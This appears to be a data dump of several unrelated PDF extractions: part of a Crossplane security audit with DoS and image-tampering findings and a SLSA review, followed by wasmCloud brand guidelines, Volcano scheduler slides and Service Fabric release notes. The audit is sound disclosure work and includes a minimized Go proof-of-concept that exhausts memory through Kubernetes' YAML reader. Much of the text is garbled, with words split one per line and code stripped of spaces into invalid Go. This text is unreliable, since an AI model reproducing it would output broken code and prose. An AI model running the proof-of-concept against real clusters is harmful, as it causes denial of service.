ha1.RunFunctionRequest{Image:fn.Image,Input:in,ImagePullConfig:ImagePullConfig(fn),RunFunctionConfig:RunFunctionConfig(fn),}\nfor_,opt:=rangeo{iferr:=opt(ctx,fn,req);err!=nil{returnnil,errors.Wrap(err,errApplyRunFunctionOption)}}\nrsp,err:=823824825826827828829830831832...835836837fnv1alpha1.NewContainerizedFunctionRunnerServiceClient(conn).RunFunction(ctx,req)iferr!=nil{//TODO(negz):ParseanygRPCstatuscodes._=conn.Close()returnnil,errors.Wrap(err,errRunFnContainer)}\niferr:=conn.Close();err!=nil{returnnil,errors.Wrap(err,errCloseRunner)}\n...out:=&iov1alpha1.FunctionIO{}returnout,errors.Wrap(yaml.Unmarshal(rsp.Output,out),errUnmarshalFnIO)}A D A - X P - 2 3 - 9 :\nP o s s i b l e\ne n d l e s s\nd a t a\na t t a c k\ni n\nC r o s s p l a n e ’ s\nI m a g e\nb a c k e n d\nID\nADA-XP-23-9\nComponent\nCrossplaneʼs\nOCI\nstore\nSeverity\nModerate\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4348\nCrossplaneʼs\nimage\nbackend\nis\nsusceptible\nto\nan\nendless\ndata\nattack\nfrom\nan\nunrestricted\nloop\nthrough\nmanifest\nlayers\nin\nCrossplane\npackages.\nTo\nlaunch\nthis\nattack,\nthe\nattacker\nneeds\nto\ncra\u0000\nan\nimage\ncontaining\na\nmanifest\nwith\na\nhigh\nnumber\nof\nlayers.\nThen,\nthey\nneed\nto\neither\ncompromise\nthe\nregistry\nor\ntrick\nthe\nuser\ninto\nconsuming\nthe\nimage\nby\nway\nof\ndependency\nconfusion\nor\ntyposquatting\nattack\nvectors.\nThe\nimpact\nwill\nbe\nthat\nthe\nrevision\ncontroller\nwill\nbe\nstuck\nin\nan\ninfinite\nloop\nand\nbe\nprevented\nfrom\nfinishing\nthe\ntask\nand\ndoing\nother\nsubsequent\ntasks.\nThe\nissue\nhas\nits\nroot\ncause\nin\nthe\nimage\nbackend:\nhttps://github.com/crossplane/crossplane/blob/f32e27f375b0218ccaf49e072c5661d71f368131/int\nernal/controller/pkg/revision/imageback.go#LL94C1-L110C4\n9495\n96979899100101102103104105106107108\n109110//Fetchimagefromregistry.img,err:=i.fetcher.Fetch(ctx,ref,v1.RefNames(n.pr.GetPackagePullSecrets())...)iferr!=nil{returnnil,errors.Wrap(err,errFetchPackage)}//Getimagemanifest.manifest,err:=img.Manifest()iferr!=nil{returnnil,errors.Wrap(err,errGetManifest)}//Determineiftheimageisusingannotatedlayers.vartarcio.ReadCloserfoundAnnotated:=falsefor_,l:=rangemanifest.Layers{ifa,ok:=l.Annotations[layerAnnotation];!ok||a!=baseAnnotationValue{continue}\nAn\nattacker\ncan\nadd\na\nhigh\nnumber\nof\nlayers\nto\nthe\nmanifest\nwhich\ncan\ncause\nCrossplane\nto\ngo\ninto\nan\ninfinite\nloop.A D A - X P - 2 3 - 1 0 :\nD e n i a l\no f\ns e r v i c e\nf r o m\nm a l i c i o u s\nC r o s s p l a n e\np a c k a g e\nID\nADA-XP-23-10\nComponent\nRevision\nimage\nbackend\nSeverity\nModerate\nFixed\nin:\nhttps://github.com/google/go-containerregistry/pull/1742\nIf\nCrossplaneʼs\nimage\nbackend\ndoes\nnot\nfind\nan\nannotated\nfile,\nit\nwill\ncall\ngo-containerregistryʼsExtract()\nAPI\npassing\nthe\nfetched\nimage:\nhttps://github.com/crossplane/crossplane/blob/f32e27f375b0218ccaf49e072c5661d71f368131/int\nernal/controller/pkg/revision/imageback.go#L131-L133\n131132133if!foundAnnotated{tarc=mutate.Extract(img)}\nWhen\ngo-containerregistry\nextracts\nthe\nimage,\nit\ndecompresses\neach\nlayer\nand\nultimately\ncopies\nthe\ncontents\nfrom\na\ntar\nReader\nto\na\ntar\nWriter:\nhttps://github.com/google/go-containerregistry/blob/03b86570e60f261bf4a79b903d73e03cb8629\n10b/pkg/v1/mutate/mutate.go#L331-L340\n332332333334335336\n337338339340if!tombstone{iferr:=tarWriter.WriteHeader(header);err!=nil{returnerr}ifheader.Size>0{if_,err:=io.CopyN(tarWriter,tarReader,header.Size);err!=nil{returnerr}}}\nWhen\ncopying\nthe\nfile,\nthere\nis\nno\nupper\nlimit\nto\nthe\nfile\nsize\nwhich\nallows\nan\nattacker\nto\ncompress\na\nlarge\nlayer\nthat\nwill\ncrash\ngo-containerregistry\nand\nthereby\nCrossplane\nwith\nan\nout\nof\nmemory\npanic.A D A - X P - 2 3 - 1 1 :\nP o s s i b l e\ni m a g e\nt a m p e r i n g\nf r o m\nm i s s i n g\ni m a g e\nv a l i d a t i o n\nID\nADA-XP-23-11\nComponent\nRevision\nimage\nbackend\nSeverity\nHigh\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4370\nCrossplaneʼs\nimage\nbackend\nis\nsusceptible\nto\nan\nimage\ntampering\nattack\ndue\nto\ninsufficient\nvalidation\nof\nCrossplane\npackages.\nAn\nattacker\ncan\nlaunch\nan\nattack\nagainst\nCrossplane\nby\ncompromising\nthe\nregistry\nfrom\nwhich\nCrossplane\nfetches\nthe\nimage.\nThe\nattacker\ncould\nthen\nreplace\nthe\nimage\nthat\nthe\nuser\nis\nreferencing\nand\ntrick\nCrossplane\nusers\ninto\nfetching\na\ntampered\nimage.\nCrossplane\nusers\ncan\nreference\nimages\nby\ntags\nor\ndigests.\nDigests\nare\nthe\nmore\nsecure\nway\nto\nreference,\nhowever,\nin\nthis\ncase,\neven\nif\nthe\nuser\nreferenced\nan\nimage\nby\ndigest,\nthe\nuser\nhad\ninsufficient\nguarantee\nthat\nthe\nimage\nthey\nfetched\nwas\nthe\ncorrect\none.\nCrossplane\nfixed\nthe\nissue\nby\nvalidating\nboth\nthe\nimage\nitself\nas\nwell\nas\neach\nlayer\nin\nthe\nfetched\nimage\nmanifest.\nCVE-2023-38495\nhas\nbeen\nassigned\nthis\nfinding.A D A - X P - 2 3 - 1 2 :\nP o s s i b l e\ne n d l e s s\nd a t a\na t t a c k\ni n\nP r o v i d e r R e v i s i o n\nc o n t r o l l e r\nID\nADA-XP-23-12\nComponent\nProviderRevision \ncontroller\nSeverity\nModerate\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4347\nA\nCrossplane\nuser\nthat\ncan\nsend\na\nrequest\nto\nthe\nProviderRevision\ncontroller\ncan\nlaunch\nan\nendless\ndata\nattack\nagainst\nthe\ncontroller\nif\nthe\nrequest\nhas\na\nhigh\nnumber\nof\npolicy\nrules.\nThe\nreconciler\nvalidates\nincoming\nrequests\nby\nway\nofValidatePermissionRequests()\n,\nhttps://github.com/crossplane/crossplane/blob/5abc44508f88d892535fc8608d5e35ad5df\nb5a0a/internal/controller/rbac/provider/roles/reconciler.go#L303\n,\nwhich\nloops\nthrough\nthe\nrequests\npolicy\nrules:\nhttps://github.com/crossplane/crossplane/blob/f32e27f375b0218ccaf49e072c5661d71f368131/int\nernal/controller/rbac/provider/roles/requests.go#L174-L193\n174\n175176\n177178179180181182183184185186187188189190191192193func(v*ClusterRoleBackedValidator)ValidatePermissionRequests(ctxcontext.Context,requests...rbacv1.PolicyRule)([]Rule,error){cr:=&rbacv1.ClusterRole{}iferr:=v.client.Get(ctx,types.NamespacedName{Name:v.name},cr);err!=nil{returnnil,errors.Wrap(err,errGetClusterRole)}\nt:=newNode()for_,rule:=rangeExpand(cr.Rules...){t.Allow(rule.path())}\nrejected:=make([]Rule,0)for_,rule:=rangeExpand(requests...){if!t.Allowed(rule.path()){rejected=append(rejected,rule)}}\nreturnrejected,nil}If\nthe\nlength\nof\nrequests\nis\nsufficiently\nlarge,\na\nthreat\nactor\ncan\ncause\nCrossplane\ninto\nspending\nexcessive\ntime\non\nthis\nloop\nand\ncan\nuse\nthat\nto\nprevent\nthe\ncontroller\nfrom\nperforming\nother\ntasks,\nsuch\nas\nupgrading\nProviders.\nAn\nattacker\ncould\nleverage\nthat\nto\nprevent\nCrossplane\nfrom\nupgrading\nto\na\nsecure\nProvider\npackage\nwhile\nexploiting\na\nknown\nvulnerability\nin\nthe\ncurrent\nversion\nof\nthe\npackage.A D A - X P - 2 3 - 1 3 :\nP o s s i b l e\ne n d l e s s\nd a t a\na t t a c k\ni n\nC r o s s p l a n e ’ s\nO C I\ns t o r e\nI\nID\nADA-XP-23-13\nComponent\nCrossplaneʼs\nOCI\nstore\nSeverity\nModerate\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4203\nThis\nissue\naffects\nan\nalpha\nfeature\nin\nCrossplane.\nCrossplaneʼs\nOCI\nstore\nis\nsusceptible\nto\nan\nendless\ndata\nattack\nif\nthe\nimage\nthat\nCrossplane\nfetches\nhas\na\nhigh\nnumber\nof\nlayers.\nAn\nattacker\ncan\nlaunch\nthe\nattack\nagainst\nCrossplane\nby\ncompromising\nthe\nregistry\nand\nreplacing\nthe\noriginal\nimage\nwith\na\ntampered\nimage\ncontaining\na\nhigh\nnumber\nof\nlayers\nor\nby\ntricking\na\nCrossplane\nuser\ninto\nfetching\nthe\nimage\nby\nway\nof\ndependency\nconfusion\nor\ntyposquatting\nattack\nvectors.\nThe\nroot\ncause\nof\nthe\nissue\nis\nthat\nthe\nCrossplane\nloops\nthrough\nthe\nlayers\nof\nthe\nfetched\nimage\nwithout\nan\nupper\nlimit.\nAn\nattacker\ncan\nadd\na\nhigh\nnumber\nof\nlayers\nto\nthe\nmanifest\nwhich\ncan\ncause\nCrossplane\nto\ngo\ninto\nan\ninfinite\nloop.\nhttps://github.com/crossplane/crossplane/blob/b01a0f8c0830f038514714baf24deb7ef21bbad4/in\nternal/oci/store/overlay/store_overlay.go#L166\n166\n167168169170171172173174175176177178179180181182183184func(c*CachingBundler)Bundle(ctxcontext.Context,iociv1.Image,idstring,o...spec.Option)(store.Bundle,error){cfg,err:=i.ConfigFile()iferr!=nil{returnnil,errors.Wrap(err,errReadConfigFile)}\nlayers,err:=i.Layers()iferr!=nil{returnnil,errors.Wrap(err,errGetLayers)}\nlowerPaths:=make([]string,len(layers))fori:=rangelayers{p,err:=c.layer.Resolve(ctx,layers[i],layers[:i]...)iferr!=nil{returnnil,errors.Wrap(err,errResolveLayer)}lowerPaths[i]=p}A D A - X P - 2 3 - 1 4 :\nP o s s i b l e\ne n d l e s s\nd a t a\na t t a c k\ni n\nC r o s s p l a n e ’ s\nO C I\ns t o r e\nI I\nID\nADA-XP-23-14\nComponent\nCrossplaneʼs\nOCI\nstore\nSeverity\nModerate\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4203\nThis\nissue\naffects\nan\nalpha\nfeature\nin\nCrossplane.\nThis\nissue\nis\nsimilar\nto\nADA-XP-23-13\nin\nattack\nvector,\nimpact\nand\nroot\ncause\nbut\naffects\nthe\nhandling\nof\nuncompressed\nlayers.\nhttps://github.com/crossplane/crossplane/blob/d0d7527f92869a780a49d25d15fea0ed54f3bf0b/in\nternal/oci/store/uncompressed/store_uncompressed.go#L89\n89\n90919293949596979899100101102103104105106107108109110111112113114115116117func(c*Bundler)Bundle(ctxcontext.Context,iociv1.Image,idstring,o...spec.Option)(store.Bundle,error){cfg,err:=i.ConfigFile()iferr!=nil{returnnil,errors.Wrap(err,errReadConfigFile)}\nlayers,err:=i.Layers()iferr!=nil{returnnil,errors.Wrap(err,errGetLayers)}\npath:=filepath.Join(c.root,id)rootfs:=filepath.Join(path,store.DirRootFS)iferr:=os.MkdirAll(rootfs,0700);err!=nil{returnnil,errors.Wrap(err,errMkRootFS)}b:=Bundle{path:path}\nfor_,l:=rangelayers{tb,err:=l.Uncompressed()iferr!=nil{_=b.Cleanup()returnnil,errors.Wrap(err,errOpenLayer)}iferr:=c.tarball.Apply(ctx,tb,rootfs);err!=nil{_=tb.Close()_=b.Cleanup()returnnil,errors.Wrap(err,errApplyLayer)}118119120121122iferr:=tb.Close();err!=nil{_=b.Cleanup()returnnil,errors.Wrap(err,errCloseLayer)}}\nAn\nattacker\ncan\nadd\na\nhigh\nnumber\nof\nlayers\nto\nthe\nmanifest\nwhich\ncan\ncause\nCrossplane\nto\ngo\ninto\nan\ninfinite\nloop\nwhen\nCrossplane\nreads\nthe\nlayers\nof\nthe\nimage.A D A - X P - 2 3 - 1 5 :\nP o s s i b l e\ne n d l e s s\nd a t a\na t t a c k\ni n\nC r o s s p l a n e ’ s\nO C I\ns t o r e\nI I I\nID\nADA-XP-23-15\nComponent\nCrossplaneʼs\nOCI\nstore\nSeverity\nModerate\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4203\nThis\nissue\naffects\nan\nalpha\nfeature\nin\nCrossplane.\nThis\nissue\nis\nsimilar\nto\nADA-XP-23-13\nin\nattack\nvector,\nimpact\nand\nroot\ncause\nbut\naffects\nthe\nroutine\nthat\nwrites\nthe\nfetched\nimage\nto\nthe\nOCI\nstore.\nhttps://github.com/crossplane/crossplane/blob/498b2fcbcc5323676d48048944e8a2a6d67cd87a/i\nnternal/oci/store/store.go#L162\n162...201202203204205206207208209210211212213214215216func(i*Image)WriteImage(imgociv1.Image)error{...\nlayers,err:=img.Layers()iferr!=nil{returnerrors.Wrap(err,errGetLayers)}\ng:=&errgroup.Group{}for_,l:=rangelayers{l:=l//Pinloopvar.g.Go(func()error{returni.WriteLayer(l)})}\nreturnerrors.Wrap(g.Wait(),errWriteLayers)}A D A - X P - 2 3 - 1 6 :\nD e n i a l\no f\ns e r v i c e\nf r o m\nl a r g e\ni m a g e\nID\nADA-XP-23-16\nComponent\nCrossplane-runtime \nparser\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4358\nCrossplane-runtimes\nparser\nis\nvulnerable\nto\na\nDoS\nattack.\nThe\nroot\ncause\nof\nthe\nissue\nis\nthatk8s.io/apimachinery/pkg/util/yaml.(*YAMLReader).Read()\nwill\nexhaust\nmemory\nif\nreading\nfrom\na\nlarge\nreader.\nThe\nCrossplane-runtime\nparser\nparses\nan\nimage\nfrom\na\nremote\nregistry\nusing\nKubernetesʼ\nyaml\nparser:\nhttps://github.com/crossplane/crossplane-runtime/blob/511b39fa560d40daecec2f9288850f92cc6\n2e14b/pkg/parser/parser.go#L94\n94\n9596979899100101\n102\n103104105func(p*PackageParser)Parse(_context.Context,readerio.ReadCloser)(*Package,error){//nolint:gocyclo//Onlyat11.pkg:=NewPackage()ifreader==nil{returnpkg,nil}deferfunc(){_=reader.Close()}()yr:=yaml.NewYAMLReader(bufio.NewReader(reader))dm:=json.NewSerializerWithOptions(json.DefaultMetaFactory,p.metaScheme,p.metaScheme,json.SerializerOptions{Yaml:true})do:=json.NewSerializerWithOptions(json.DefaultMetaFactory,p.objScheme,p.objScheme,json.SerializerOptions{Yaml:true})for{bytes,err:=yr.Read()iferr!=nil&&!errors.Is(err,io.EOF){\nWhen\nparsing\na\nlarge\nreader,\nGo\nwill\nreact\nby\nperforming\na\nsigkill\nand\nas\na\nresult\nwill\nalso\ncrash\nany\napplication\nusing\nthe\nparser.\nThe\nmachine\nwill\nexperience\na\ntemporary\nDoS\nbefore\nGo\nperforms\nthe\nsigkill.\nThis\nis\nan\nissue\nfor\nCrossplaneʼs\nRevision\ncontroller\nwhich\nparses\nimages\nfetched\nfrom\nremote\nregistries:\nhttps://github.com/crossplane/crossplane/blob/90b27fed1c877f4e4d2e62dbba6e26505b3\n8271b/internal/controller/pkg/revision/reconciler.go#L478\n.\nAn\nuntrusted\nimage\ncould\ncrash\nthe\nRevision\ncontroller\nand\ncause\na\ndenial\nof\nservice\nfor\nother\nusers\nof\nthe\ncluster.The\nfollowing\nminimized\nPoC\nillustrates\nthe\nissue:\n123456789101112131415161718192021222324packagemain\nimport(\"bufio\"\"fmt\"\"io\"\"bytes\"\"k8s.io/apimachinery/pkg/util/yaml\")\nfuncmain(){b:=bytes.Repeat([]byte(\"a\"),9000000000)r1:=bytes.NewReader(b)r2:=bytes.NewReader(b)r3:=bytes.NewReader(b)r4:=bytes.NewReader(b)r:=io.MultiReader(r1,r2,r3,r4)\nbRead:=bufio.NewReader(r)yr:=yaml.NewYAMLReader(bRead)fmt.Println(\"Reading...\")_,_=yr.Read()fmt.Println(\"Theend\")}\nThis\nprogram\nwill\nnot\nprint\n“The\nend”.\nThe\nconsole\nwill\nprint:\nReading...signal:killed\nCVE-2023-37900\nhas\nbeen\nassigned\nthis\nissue.\nGHSA:\nhttps://github.com/crossplane/crossplane/security/advisories/GHSA-68p4-95xf-7gx8S L S A\nSLSA\nis\na\nframework\nfor\nassessing\nthe\nsupply\nchain\nsecurity\nposture\nof\nprojects.\nThe\ncurrent\nversion\nof\nSLSA\nis\nv1.0\nwhich\nspecifies\na\nseries\nof\nrequirements\nrelated\nto\nthe\nbuild\nplatform\nfor\nso\u0000ware\nreleases\nas\nwell\nas\nthe\nprovenance\nattestation.\nSLSA\nevaluates\na\nproject\nbased\non\nfour\nsecurity\nlevels.\nLevel\n0\nhas\nno\nrequirements\nas\nwe\ndo\nnot\ninclude\nthat\nin\nthe\ntable\nbelow.\nThe\nSLSA\nframework\nis\nuseful\nto\nprotect\nagainst\na\nseries\nof\nreal-world\nsupply\nchain\nattack\nvectors,\nfor\nexample,\nduring\nthe\nSolarWinds\nattack,\nattackers\ncompromised\nthe\nbuild\nplatform\nof\na\nso\u0000ware\nvendor\n-\nSolarWinds\n-\nand\ninjected\nmalicious\ncode\nthat\nthe\nvendor\nthen\ndistributed\nto\nits\ncustomers.\nThe\nprovenance\nstatement\nhelps\nusers\ndefend\nagainst\ntyposquatting\nattacks\nor\nattacks\nas\nwell\nas\nconsuming\npackages\nfrom\nmirrors\ninstead\nof\nthe\nmain\nand\nintended\npackages.\nThese\nare\nknown\nattack\nvectors;\nrecently\nresearchers\nfound\n1,652\nmalicious\npackages\ndisguised\nas\nlegitimate\npackages\n8\n.\nSLSA\ncompliance\nis\ntherefore\nan\nimportant\nfactor\nof\nCrossplaneʼs\noverall\nsecurity\nposture\nand\nshould\nbe\nseen\nas\nan\nongoing\neffort\nto\nachieve\nand\nmaintain\na\nsolid\nintegration\nwith\nSLSAs\nspecification.\nThis\nwill\nhelp\nCrossplane\ndefend\nagainst\na\nseries\nof\nwell-known\n-\nby\nusers\nand\nmalicious\nactors\n-\nsupply\nchain\nattack\nvectors.\nOur\noverall\nassessment\nis\nthat\nCrossplane\nperforms\nwell\nagainst\nrequirements\nfor\nthe\nbuild\nplatform\nbut\nis\nlacking\nthe\nprovenance\nstatement.\nThe\nprovenance\nis\na\nlarge\nand\nimportant\npart\nof\nthe\nSLSA\nframework.\nCrossplane\nis\ncurrently\nlacking\na\ncompliant\nprovenance\nstatement\nwhich\nbrings\ncompliance\nto\na\nlow\nlevel.\nCrossplane\nis\nperforming\nwell\nin\nother\nareas\nsuch\nas\nthe\nbuild\nplatform\nfor\nrelease\nartifacts.\nWe\nrecommend\nadding\nthe\nprovenance\ngeneration\nvia\nSLSAʼs\nofficial\nGithub\nActions\nworkflows:\nhttps://github.com/slsa-framework/slsa-github-generator\n.\nThe\nSLSA\ncommunity\nis\ncurrently\nworking\non\na\nframework,\nBring\nYour\nOwn\nBuilder\n(BYOB),\nwhich\nincludes\nlevel\n3\ncompliance\nout\nof\nthe\nbox.\nOur\nassessment\nfor\neach\ncriteria:\nRequirement\nL1\nL2\nL3\nProvenance\ngeneration\nProvenance\nExists\n⛔\n⛔\n⛔\nProvenance\nis\nAuthentic\n⛔\n⛔\n8\nhttps://sysdig.com/blog/analysis-of-supply-chain-attacks-through-public-docker-images/Provenance\nis\nUnforgeable\n⛔\nIsolation\nHosted\n✓\n✓\nIsolated\n✓" } ]
{ "category": "Orchestration & Management", "file_name": "wasmcloud_visual-guidelines-1.0.pdf", "project_name": "wasmCloud", "subcategory": "Scheduling & Orchestration" }
[ { "data": "VISUAL GUIDELINES\nUPDATED FEBRUARY 18, 2021\nAll content in this document, including but not limited to creative direction, artwork and copy writing, are meant to serve as the guideline that governs the \nusage of the logo and any additional brand assets developed by Legacy79. Implementation and enforcement will be the full responsibility of Wasmcloud.2\nWasmcloud | Table of Contents \nLogo Identity ............................................................................................................................................... 03\nLogo Variations ......................................................................................................................................... 04\nMandatory Clear Space ....................................................................................................................... 05\nColor Application ..................................................................................................................................... 06\nColor Palettes ............................................................................................................................................. 07\nColor Application Examples .............................................................................................................. 08\nPromo Execution Examples .............................................................................................................. 093\nWasmcloud | Logo Identity\nDESCRIPTION\nThe combination of the “W” brandmark and the stylized letters for Wasmcloud are referred to as the \nWasmcloud Logo or Signature. The logo is the core element in the Wasmcloud Visual Identity System. Its \nrelative size, positioning and color treatment are governed by the rules in this guide. This logo replaces \nany previous designs, and it is the only graphic device to be used to represent Wasmcloud. \nNote: The logo is a unique design and cannot be accurately reproduced with any typeface. It must not be \nhand drawn, scanned or modified in any way. It should be used only from approved electronic files.NARRATIVE\nThe Wasmcloud logo conveys security and portability. Wasmcloud is a foundational \nbuilding block for developers and organizations to rapidly create and execute code \nin a secure and portable application framework. Our brandmark is an hexagon \n(interlocking pieces) and “w” (custom solution) that combined create a box \n(white space) to symbolize portability.Brandmark\nLogotypeWasmcloud Logo4\nWasmcloud | Logo Variations\nSTACKED VERSION (PRIMARY)\nThe Stacked Version is the preferred representation of the \nWasmcloud logo identity. This orinetation should be considered \nfirst in all applications. \nHORIZONTAL VERSION (ALTERNATE)\nThe Horizontal Version of the Wasmcloud logo is a valid \napplication and should be employed in horizontal spaces where \nthe Stacked Version does not appropriately fit.\n“SHIELD” BRANDMARK (SUPPLEMENTAL)\nThe “ W” brandmark of the Wasmcloud logo can be used as a \nsupport element and/or for promotional purposes. The brandmark \nshould always be used in a context where the full version of the \nWasmcloud logo is present.5\nWasmcloud | Mandatory Clear Space\nSPACING GUIDELINES\nMaintain generous margins throughout printed and \nonline materials to allow elements to have proper \nbreathing room and to aid the reader’s eye in navigation. X-HEIGHT\nAlways maintain a clear space greater than or equal to:\nStacked Logo – The bottom of the Wasmcloud letters and the bottom of the “W” icon (X).\nHorizontal Logo – The bottom of the “W” icon and the top of the Wasmcloud letters (X).STACKED VERSION \nHORIZONTAL VERSION 6\nFULL COLOR: PMS 3395 & PMS 533\nFULL COLOR: \n PMS 7541 @ 55%, PMS 3395 & PMS 533ONE COLOR: PMS 3395\nONE COLOR REVERSED: WHITE & PMS 3395BLACK\nBLACK & WHITE (REVERSED)Full Color Applications (Preferred) One Color (PMS) Applications (Allowed) Single Color Applications (Allowed)Wasmcloud | Color Application \nACCEPTABLE COLOR USE\nThe full color applications of the Wasmcloud logo are the primary \nand preferred versions for reproduction. It may be reproduced on \nPMS 7541 with a 55% screen, or a solid white background. No other \ncolor substitutions should be allowed.ONE COLOR (PMS) APPLICATIONS\nWhen reproducing the Wasmcloud logo in a one PMS color \napplication, the logo may be reproduced on a solid white \nbackground or inverted on PMS 3395. No other color \nsubstitutions should be allowed.SINGLE COLOR APPLICATIONS\nWhen reproducing the Wasmcloud logo in a single color \napplication, Black or white are acceptable colors. No other color \nsubstitutions are allowed.7\nWasmcloud | Color Palettes\nColorPrimary Color Palette\nPMS C HEX CMYK\nGreen Aqua 3395 C #00C389 77 / 0 / 67 / 0 0 / 195 / 137\nLight Gray 7544 C #768692 53 / 34 / 22 / 10 118 / 134 / 146RGB\nSecondary Color Palette\nGainsboro 7541 C #D9E1E2 10 / 3 / 0 / 0 217 / 225 / 226Yellow 7549 C #FFB600 0 / 22 / 100 / 0 255 / 182 / 0\n7546 C #253746 88 / 57 / 27 / 65 37 / 55 / 70 Gunmetal648 C #002E5D 100 / 69 / 0 / 56 0 / 46 / 93 Space Blue\nLEGEND\nPMS – Pantone® Matching System\nUsed primarily for stationery and \nexecutions where the exact colors \nneed to be followed.CMYK (Cyan, Magenta, Yellow & Black)\nPrint settings used whenever the \nlogo is reproduced in a four color \nprocess (e.g. brochures, flyers, etc.).HEX & RGB (Red, Green & Blue)\nRGB refers to “screen settings” – \nused whenever the logo is intended \nfor use on a screen/monitor and \nnot print (e.g. website, e-mail, etc.).ACCEPTABLE COLOR USE\nThe Primary Wasmcloud Color Palette consists of Green Aqua & Light \nGray. These colors are reproduced most accurately in Pantone® 3395 C \nand Pantone® 7544 C. \nThe Secondary Color Palette is intended for supplementary use such \nas borders, backgrounds, line dividers, etc.8\nWasmcloud | Color Application Directional Samples\nCOLLATERAL SAMPLEAN ENTERPRISE-\nGRADE SECURITY \nPLATFORM\nCOLLATERAL SAMPLEAN ENTERPRISE-\nGRADE SECURITY \nPLATFORM\nCOLLATERAL SAMPLEAN ENTERPRISE-\nGRADE SECURITY \nPLATFORM9\nWasmcloud | Execution Directional Samples\n" } ]
{ "category": "Orchestration & Management", "file_name": "volcano-introduction.pdf", "project_name": "Volcano", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Volcano: Bring Batch Capability \nInto Kubernetes\nDa Ma (@k82cn)\nHuawei Expert\nDa Ma Software Architect\nKubernetes SIG -Scheduling co -Leader\nVolcano & kube -batch creator\nExpert at Huawei (now)\nEx-IBM Spectrum CE/L3 Team/Tech Lead\nJilin University master’s degree, \nmajoring in grid computing and distributed \nsystem\nGaps\nJob/Queue Management\n•Queue status/configuration\n•Hierarchical queue\n•Job with multiple pod template\n•Lifecycle management of Job, e.g. restart, \nsuspend/resume\n•Error Handling, e.g. restart job if pod failed (MPI, TFJob)\n•Indexed Job\n•Task dependency, e.g. Spark (executor/driver)\n•Delay Pod Creation\n•…\nRuntime\n•Singularity\n•…Scheduler\n•Coscheduling\n•Faire -share\n•Queue\n•Preemption/Reclaim\n•Reserve/Backfill\n•Topology (network, accelerator)\n•…\nOthers\n•Throughput\n•Round -trip\n•Data locality (Data Aware Scheduling)\n•…Volcano: A Kubernetes Native Batch System\nWebsite: https://volcano.sh\nGithub: http://github.com/volcano -sh/volcano\nTwitter: https://twitter.com/volcano_sh\nSlack: http://volcano -sh.slack.com\nEmail: volcano -sh@googlegroups.comOverall Architecture\nDomain frameworks:\n•Deployment/Installation of framework in k8s\n•Map framework’s terms/concepts into common concept, e.g. Job, \nQueue\n•Enable related features for frameworks, e.g. gang -scheduling for \nTensorFlow training\nCommon Service for high performance workload:\n•Batch scheduling, e.g. fair -share, gang -scheduling\n•Enhanced job management, e.g. multiple pod template, error handling\n•Accelerator, e.g. GPU, FPGA\n•kubectl plugins, e.g. show Job/Queue informationOverall Architecture\nThe policy in vk-scheduler is pluggable, e.g. DRF, Priority, Gang\nvk-controllers includes JobExController , QueueController\nVolcano handles high performance workloadKubectl creates a JobEx object in \napiserver if all admission passed\nJobExController create Pods based \non its replicas and templates\nvk-scheduler get the notification \nof Pod from apiserver\nvk-scheduler chooses one host for \nthe Pod of JobEx based on its \npolicy\nkubelet gets the notification of Pod \nfrom apiserver; and then start the \ncontainerScenarios: MPI\nmpirunworker_1\nworker_3worker_2\n•Multiple Pod Template\n•Lifecycle Policy\n•Gang-scheduling•ssh or kubectl\n•Complete job when mpirun completed\n•Headless serviceScenarios: MPI\n•The workers are deleted by job controller \nbecause of sshd\n•The pod of mpiexec/mpirun will not be \ndeleted for output\n•The pod of mpiexec/mpirun may restart few \ntimes because of network setup delayScenarios: Faire Share\nGang-scheduling: Job Execution Time\nhttp://status.openlabtesting.org/builds?project=theopenlab%2Fvolcano\n•Case 1: 1 job with 2ps + 4workers\n•Case 2: 2 jobs with 2ps + 4workers\n•Case 3: 5 jobs with 2ps + 4workers\n•No enough resource for 2 Jobs to run \nconcurrently; one of them wasting resources \nwithout Gang -Scheduling !\n•2 of 5 jobs was finished because of deadlock \n(+20 hours)Task-Topology + Binpack\n•The execution time of 3 jobs in total; 2ps + \n4workers for each job\n•The execution time is unstable when tested by \ndefault scheduler\n•The improvement dependent on data \nexchanges between pods\n•Task -topology within a Job also improved \nscheduler’s performance\n•Open Source at volcano -sh/volcano#272\nReference: “Optimus: An Efficient Dynamic Resource Scheduler for Deep Learning Clusters”\nIntegrations\nFramework Status API\nMPI Done Volcano Job\nHorovod Done Volcano Job\nKubeflow/tf -operator Done PodGroup\nKubeflow/arena Done Volcano Job\nSpark-Operator On-going PodGroup\nCromwell On-going Volcano Job\nPaddlePaddle On-going Volcano Job\n… On-going Volcano Job / PodGroupPipeline\n●GPU Share/Topology\n●Job Management\n●Queue Management\n●Hierarchical Queue\n●Preemption/Reclaim\n●……Call for \nContribution" } ]
{ "category": "Orchestration & Management", "file_name": "name_white.pdf", "project_name": "Kubernetes", "subcategory": "Scheduling & Orchestration" }
[ { "data": "kubernetes" } ]
{ "category": "Orchestration & Management", "file_name": "Service_Fabric_ReleaseNotes_65CU1.pdf", "project_name": "Azure Service Fabric", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Microsoft Azure Service Fabric 6.5 First Refresh Release Notes \nThis release includes the bug fixes and features described in this document. This release includes runtime, SDKs and Windows Server Standalone \ndeployments to run on -premises. \nThe following packages and versions are part of this release \nService Fabric Runtime Ubuntu 6.5.454.1 \nWindows 6.5.641.9590 \nService Fabric for Windows Server Service Fabric Standalone Installer \nPackage 6.5.641.9590 \n.NET SDK Windows .NET SDK 3.4.641 \nMicrosoft.ServiceFabric 6.5.641 \nReliable Services and Reliable \nActors 3.4.641 \nASP.NET Core Service Fabric \nintegration 3.4.641 \nJava SDK Java for Linux SDK 1.0.5 \nService Fabric PowerShell and CLI AzureRM PowerShell Module 0.3.15 \nSFCTL 8.0.0 \nService Fabric Tooling Visual Studio Tooling 2.5.20615.1 \n \nEclipse Tooling 2.0.7 \n Table of Contents \nMicrosoft Azure Service Fabric 6.5 First Refresh Release Notes ................................ ................................ ................................ ................................ . 1 \nBreaking announcements ................................ ................................ ................................ ................................ ................................ .............................. 3 \nUpgrade requirements for Docker Co mpose customers ................................ ................................ ................................ ................................ ............... 5 \nService Fabric Common Bug Fixes ................................ ................................ ................................ 